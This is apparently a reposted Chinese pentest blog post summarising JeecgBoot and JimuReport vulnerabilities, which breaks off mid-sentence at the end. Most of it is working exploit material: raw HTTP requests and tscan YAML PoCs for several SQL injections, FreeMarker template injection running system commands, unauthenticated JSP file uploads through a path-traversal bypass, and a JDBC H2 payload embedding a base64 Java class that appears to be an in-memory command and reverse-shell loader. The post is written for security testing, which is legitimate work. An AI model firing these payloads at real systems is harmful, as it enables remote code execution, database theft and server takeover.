Jeecg漏洞总结及tscan poc分享

发布于2025年3月26日2025年7月19日作者:cve-20

Jeecg漏洞总结及tscan poc分享

蚁景网络安全 2025-03-25 20:04

前言jeecgboot是一款基于代码生成器的低代码开发平台，集成完善的工作流、表单、报表、大屏的平台！前后端分离架构 SpringBoot 2.x，SpringCloud，Ant Design&Vue，Mybatis-plus，Shiro，JWT，成熟的微服务解决方案。最近的攻防演练中经常遇到部署该服务的系统，而且大部分都有可利用的漏洞点，故整理一篇漏洞总结文章方便日后查阅，并且根据tscan脚本规则编写了其中一部分的poc。这篇文章只整理了一些利用价值较高的漏洞，部分漏洞如信息泄露、任意文件下载、任意用户密码重置等未一一复现。Jeecg-boot 3.4.4 /sys/dict/queryTableData SQL注入漏洞简介cve公告：在Jeecg-boot 3.4.4中曾发现分类为致命的漏洞。此漏洞会影响未知代码文件/sys/dict/queryTableData。手动调试的不合法输入可导致 SQL注入。漏洞复现POST /jeecg-boot/jmreport/qurestSql HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13Content-Type: application/json; charset=utf-8Content-Length: 127Host: Connection: closeAccept-Encoding: gzip, deflate{“apiSelectId”:”1316997232402231298″,”id”:”1′ or ‘%1%’ like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or ‘%%’ like ‘”}该漏洞的另一个常见路径为/jmreport/qurestSql其他参数不变Tscan脚本详见http://wiki.tidesec.com/docs/Weapon/Weapon-1f9r5r44rudtojeecg-boot/积木报表系统testConnection接口远程命令执行漏洞简介jeecg-boot/jmreport/testConnection Api接口未进行身份验证，并且未对 dbUrl 参数进行限制，导致攻击者可以向指定地址发起JDBC请求。漏洞复现POST /jmreport/testConnection HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateAccept: /Connection: closeHost: 127.0.0.1Content-Type: application/jsonCmd: whoamiContent-Length: 8902{ “id”:”1″, “code”:”ABC”, “dbType”:”MySQL”, “dbDriver”:”org.h2.Driver”, “dbUrl”:”jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS ‘void shellexec(String b) throws Exception {byte[] bytes\;try{bytes=java.util.Base64.getDecoder().decode(b)\;}catch (Exception e){e.printStackTrace()\;bytes=javax.xml.bind.DatatypeConverter.parseBase64Binary(b)\;}java.lang.reflect.Method defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod(\\”defineClass\\”, byte[].class,int.class,int.class)\;defineClassMethod.setAccessible(true)\;Class clz=(Class)defineClassMethod.invoke(new javax.management.loading.MLet(new java.net.URL[0],java.lang.Thread.currentThread().getContextClassLoader()), bytes, 0,bytes.length)\;clz.newInstance()\;}’\;CALL EXEC(‘yv66vgAAADEBawoAHQCSCgBEAJMKAEQAlAoAHQCVCACWCgAbAJcKAJgAmQoAmACaBwCbCgBEAJwIAIwKACAAnQgAnggAnwcAoAgAoQgAogcAowoAGwCkCAClCACmBwCnCwAWAKgLABYAqQgAqggAqwcArAoAGwCtBwCuCgCvALAIALEHALIIALMKAH4AtAoAIAC1CAC2CQAmALcHALgKACYAuQgAugoAfgC7CgAbALwIAL0HAL4KABsAvwgAwAcAwQgAwggAwwoAGwDEBwDFCgBEAMYKAMcAuwgAyAoAIADJCADKCgAgAMsIAMwKACAAzQoAIADOCADPCgAgANAIANEJAH4A0goAJgDTCgAmANQJAH4A1QcA1goARADXCgBEANgIAI0IANkKAH4A2ggA2woA3ADdCgAgAN4IAN8IAOAIAOEHAOIKAFAAkgoAUADjCADkCgBQAOUIAOYIAOcIAOgIAOkKAOoA6woA6gDsBwDtCgDuAO8KAFsA8AgA8QoAWwDyCgBbAPMKAFsA9AoA7gD1CgDuAPYKAC8A5QgA9woAIAD4CAD5CgDqAPoHAPsKACYA/AoAaQD9CgBpAO8KAO4A/goAaQD+CgBpAP8KAQABAQoBAAECCgEDAQQKAQMBBQUAAAAAAAAAMgoARAEGCgDuAQcKAGkBCAgBCQoALwEKCAELCAEMCgB+AQ0HAQ4BAAJpcAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHBvcnQBABNMamF2YS9sYW5nL0ludGVnZXI7AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAHZXhlY3V0ZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAEZXhlYwEAB3JldmVyc2UBADkoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9JbnRlZ2VyOylMamF2YS9sYW5nL1N0cmluZzsBAANydW4BAApTb3VyY2VGaWxlAQAHQTQuamF2YQwAgwCEDAEPARAMAREBEgwBEwEUAQAHdGhyZWFkcwwBFQEWBwEXDAEYARkMARoBGwEAE1tMamF2YS9sYW5nL1RocmVhZDsMARwBHQwBHgEfAQAEaHR0cAEABnRhcmdldAEAEmphdmEvbGFuZy9SdW5uYWJsZQEABnRoaXMkMAEAB2hhbmRsZXIBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MASABFAEABmdsb2JhbAEACnByb2Nlc3NvcnMBAA5qYXZhL3V0aWwvTGlzdAwBIQEiDAEaASMBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwBJAElAQAQamF2YS9sYW5nL09iamVjdAcBJgwBJwEoAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwAigCLDAEpASoBAAlzZXRTdGF0dXMMASsBLAEAEWphdmEvbGFuZy9JbnRlZ2VyDACDAS0BACRvcmcuYXBhY2hlLnRvbWNhdC51dGlsLmJ1Zi5CeXRlQ2h1bmsMAIgAiQwBLgEvAQAIc2V0Qnl0ZXMBAAJbQgwBMAElAQAHZG9Xcml0ZQEAE2phdmEvbGFuZy9FeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAwBMQCJAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24MATIBMwcBNAEAAAwBNQE2AQAQY29tbWFuZCBub3QgbnVsbAwBNwEdAQAFIyMjIyMMATgBOQwBOgE7AQABOgwBPAE9AQAiY29tbWFuZCByZXZlcnNlIGhvc3QgZm9ybWF0IGVycm9yIQwAfwCADAE+AT8MAUABQQwAgQCCAQAQamF2YS9sYW5nL1RocmVhZAwAgwFCDAFDAIQBAAVAQEBAQAwAjACLAQAHb3MubmFtZQcBRAwBRQCLDAFGAR0BAAN3aW4BAARwaW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBRwFIAQAFIC1uIDQMAUkBHQEAAi9jAQAFIC10IDQBAAJzaAEAAi1jBwFKDAFLAUwMAIwBTQEAEWphdmEvdXRpbC9TY2FubmVyBwFODAFPAVAMAIMBUQEAAlxhDAFSAVMMAVQBVQwBVgEdDAFXAVAMAVgAhAEABy9iaW4vc2gMAIMBWQEAB2NtZC5leGUMAIwBWgEAD2phdmEvbmV0L1NvY2tldAwBWwEiDACDAVwMAV0BXgwBXwFVBwFgDAFhASIMAWIBIgcBYwwBZAEtDAFlAIQMAWYBZwwBaAEiDAFpAIQBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyAtPgwBagEdAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAI0AjgEAAkE0AQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQANZ2V0U3VwZXJjbGFzcwEABHNpemUBAAMoKUkBABUoSSlMamF2YS9sYW5nL09iamVjdDsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEKEkpVgEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBAAVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBABcoTGphdmEvbGFuZy9SdW5uYWJsZTspVgEABXN0YXJ0AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEADmdldEVycm9yU3RyZWFtAQAHZGVzdHJveQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEACGludFZhbHVlAQAWKExqYXZhL2xhbmcvU3RyaW5nO0kpVgEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEACGlzQ2xvc2VkAQATamF2YS9pby9J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’)”, “dbName”:”383BAb7deFC825E6″, “dbPassword”:”917982″, “userName”:”917982″ }### Tscan脚本详见http://wiki.tidesec.com/docs/Weapon/Weapon-1f92eq1vnag6lJeecgBoot jmreport/loadTableData SSTI模板注入漏洞 (CVE-2023-41544)漏洞简介cve公告：jeecg-boot 版本 3.5.3 中的 SSTI 注入漏洞允许远程攻击者通过对 /jmreport/loadTableData 组件进行精心设计的 HTTP 请求执行任意代码。漏洞复现POST /jeecg-boot/jmreport/loadTableData HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0Accept: application/json, text/plain, /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=UTF-8X-Sign: AD0488642A880C68C8E3551C3BE0F6F5X-TIMESTAMP: 1699726206096X-Access-Token: nulltoken: nullJmReport-Tenant-Id: nullContent-Length: 167Connection: closeCookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726144; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726162{“dbSource”:””,”sql”:”select ‘<#assign value=\”freemarker.template.utility.Execute\”?new()>${value(\”whoami\”)}'”,”tableName”:”test_demo);”,”pageNo”:1,”pageSize”:10}pocparams: []name: JeecgBoot jmreport/loadTableData SSTI模板注入漏洞 (CVE-2023-41544)set: a1: randomLowercase(10)rules:- method: POST path: /jeecg-boot/jmreport/loadTableData headers: Content-Type: application/json;charset=UTF-8 X-Sign: AD0488642A880C68C8E3551C3BE0F6F5 body: ‘{“dbSource”:””,”sql”:”select ”<#assign value=\”freemarker.template.utility.Execute\”?new()>${value(\”echo {{r1}}\”)}””,”tableName”:”test_demo);”,”pageNo”:1,”pageSize”:10}’ search: “” followredirects: false expression: response.status==200 && response.body.bcontains(bytes(a1))groups: {}detail: author: “” links: [] description: “” version: “”JeecgBoot AviatorScript表达式注入漏洞简介积木报表软件存在AviatorScript代码注入RCE漏洞。使用接口/jmreport/save处在text中写入AviatorScript表达式。访问/jmreport/show触发AviatorScript解析从而导致命令执行。影响版本v1.7.8漏洞复现验证pocPOST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json, text/plain, /Content-Type: application/jsonContent-Length: 34{ “sql”:”select ‘ycxhhh'”}利用pocPOST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json, text/plain, /Content-Type: application/jsonContent-Length: 108{“sql”:”select ‘result:<#assign ex=\”freemarker.template.utility.Execute\”?new()> ${ex(\”whoami \”) }'” }pocparams: []name: JeecgBoot AviatorScript表达式注入set: {}rules:- method: POST path: /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 headers: Accept: application/json, text/plain, / Content-Type: application/json body: “{\”sql\”:\”select ‘result:<#assign ex=\\”freemarker.template.utility.Execute\\”?new()> ${ex(\\”whoami \\”) }’\” \n }” search: “” followredirects: false expression: ‘response.status == 200 && response.body.bcontains(b”success”) && response.body.bcontains(b”true”) && response.body.bcontains(b”result”) ‘groups: {}detail: author: “” links: [] description: “” version: “”jeecg-boot/jmreport/upload接口存在未授权任意文件上传漏洞简介测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传，经实测发现上传接口未授权，但访问上传后的文件需要登录，即带token。漏洞复现POST /jeecg-boot/jmreport/upload HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)Accept: /Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=—-WebKitFormBoundaryyfyhSCMs9cajzFD4Cache-Control: no-cachePragma: no-cacheHost: Content-Length: 1476——WebKitFormBoundaryyfyhSCMs9cajzFD4Content-Disposition: form-data; name=”file”; filename=”11111.txt”Content-Type: text/html<%! 1111>——WebKitFormBoundaryyfyhSCMs9cajzFD4Content-Disposition: form-data; name=”fileName”11111.txt——WebKitFormBoundaryyfyhSCMs9cajzFD4Content-Disposition: form-data; name=”biz”excel_online——WebKitFormBoundaryyfyhSCMs9cajzFD4–以下为访问路径下图的返回信息表示无token不可访问pocparams: []name: jeecg-boot/jmreport/upload接口存在未授权任意文件上传set: filename: randomLowercase(6)rules:- method: POST path: /jeecg-boot/jmreport/upload headers: Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryyfyhSCMs9cajzFD4 tenantId: “null” body: |- ——WebKitFormBoundaryyfyhSCMs9cajzFD4 Content-Disposition: form-data; name=”file”; filename=”{{filename}}.txt” Content-Type: text/html <%! 1111> ——WebKitFormBoundaryyfyhSCMs9cajzFD4 Content-Disposition: form-data; name=”fileName” {{filename}}.txt ——WebKitFormBoundaryyfyhSCMs9cajzFD4 Content-Disposition: form-data; name=”biz” excel_online ——WebKitFormBoundaryyfyhSCMs9cajzFD4– search: “” followredirects: false expression: response.status == 200 && response.body.bcontains(b”true”) && response.body.bcontains(bytes(string(filename)))groups: {}detail: author: “” links: [] description: “” version: “”JeecgBoot onlDragDatasetHead/getTotalData SQL注入(CVE-2024-48307)漏洞简介发现 JeecgBoot v3.7.1 通过组件 /onlDragDatasetHead/getTotalData 存在 SQL 注入漏洞。漏洞复现POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/2Host: Accept-Encoding: gzip, deflateAccept: /Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Content-Type: application/jsonContent-Length: 281{“tableName”:”sys_user”,”compName”:”test”,”condition”:{“filter”:{}},”config”:{“assistValue”:[],”assistType”:[],”name”:[{“fieldName”:”concat(0x7e,version(),0x7e)”,”fieldType”:”string”},{“fieldName”:”id”,”fieldType”:”string”}],”value”:[{“fieldName”:”id”,”fieldType”:”1″}],”type”:[]}}pocparams: []name: JeecgBoot onlDragDatasetHead/getTotalData SQL注入(CVE-2024-48307)set: rint: randomInt(800000000, 1000000000) result: base64(“~”+md5(string(rint))+”~”)rules:- method: POST path: /jeecg-boot/drag/onlDragDatasetHead/getTotalData headers: Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 body: ‘{“tableName”:”sys_user”,”compName”:”test”,”condition”:{“filter”:{}},”config”:{“assistValue”:[],”assistType”:[],”name”:[{“fieldName”:”concat(0x7e,md5({{rint}}),0x7e)”,”fieldType”:”string”},{“fieldName”:”id”,”fieldType”:”string”}],”value”:[{“fieldName”:”id”,”fieldType”:”1″}],”type”:[]}}’ search: “” followredirects: false expression: response.status==200 && response.body.bcontains(bytes(result))groups: {}detail: author: “” links: [] description: “” version: “”Jeecg-commonController.do文件上传漏洞简介由于 /api 接口鉴权时未过滤路径遍历，攻击者可构造包含 ../ 的url绕过鉴权。攻击者可构造恶意请求利用 commonController 接口进行文件上传攻击实现远程代码执行。漏洞复现POST /jeecg-boot/api/../commonController.do?parserXml HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Length: 360User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarygcflwteiConnection: close——WebKitFormBoundarygcflwteiContent-Disposition: form-data; “name=”name”zW9YCa.png——WebKitFormBoundarygcflwteiontent-Disposition: form-data; name=”documentTitle”blank——WebKitFormBoundarygcflwteiContent-Disposition: form-data; name=”file”; filename=”zW9YCa.jsp”Content-Type: image/png11111——WebKitFormBoundarygcflwtei–pocparams: []name: Jeecg-commonController.do文件上传set: filename: randomLowercase(5) r1: randomLowercase(10)rules:- method: POST path: /api/../commonController.do?parserXml headers: Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarygcflwtei body: |- ——WebKitFormBoundarygcflwtei Content-Disposition: form-data; “name=”name” zW9YCa.png ——WebKitFormBoundarygcflwtei ontent-Disposition: form-data; name=”documentTitle” blank ——WebKitFormBoundarygcflwtei Content-Disposition: form-data; name=”file”; filename=”{{filename}}.jsp” Content-Type: image/png {{r1}} ——WebKitFormBoundarygcflwtei– search: “” followredirects: false expression: response.status == 200- method: GET path: /{{filename}}.jsp headers: {} body: “” search: “” followredirects: false expression: response.status == 200 && response.body.bcontains(bytes(string(r1)))groups: {}detail: author: “” links: [] description: “” version: “”jeecg-boot-getDictItemsByTable sql注入漏洞漏洞简介JeecgBoot是一款基于代码生成器的低代码开发平台，它专为简化Java项目开发流程、提高开发效率而设计。攻击者通过注入恶意的SQL代码，能够窃取、篡改或删除数据库中的数据，甚至执行系统命令，对网站和服务器造成严重影响漏洞复现GET /jeecg-boot/sys/ng-alain/getDictItemsByTable/’%20from%20sys_user/,%20’/x.js HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brSec-Purpose: prefetchConnection: closePriority: u=6Jeecg-Boot /jmreport/show SQL注入漏洞(CVE-2023-34659)漏洞简介jeecg-boot 3.5.0和3.5.1 版本存在安全漏洞，该漏洞源于 /jeecg-boot/jmreport/show 接口的 id 参数存在SQL注入漏洞。漏洞复现漏洞点位于“统计报表”–“积木报表例子”POST /jeecg-boot/jmreport/show HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Connection: closeContent-Length: 182Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip{“id”: “961455b47c0b86dc961e90b5893bff05″,”apiUrl”: “”,”params”: { “id “: “1 ‘ or ‘ % 1 % ‘ like (updatexml(0x3a,concat(1,(version())),1)) or ‘ % % ‘ like ‘” }}jeecg-boot sys/duplicate/check SQL注入（CVE-2023-38905）漏洞简介/sys/duplicate/check 接口SQL注入，checksql可以被绕过，该漏洞需要进行身份认证。漏洞复现GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)=’root@localhost’,sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1Host: Accept-Encoding: gzip, deflateAccept: /Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36Connection: closeCache-Control: max-age=0X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU另一个payload：GET /jeecg-boot/sys/duplicate/check?tableName=sys_log&fieldName=1+and%09if(user(%20)=’root@localhost’,sleep(0),sleep(10))&fieldVal=1000&dataId=2000 jeecg-boot-checkOnlyUser信息泄露漏洞（ CVE-2021-37306）漏洞简介Jeecg-Boot 